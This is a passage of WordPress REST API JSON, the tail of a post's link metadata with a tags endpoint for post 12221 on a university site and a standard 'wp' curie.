1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}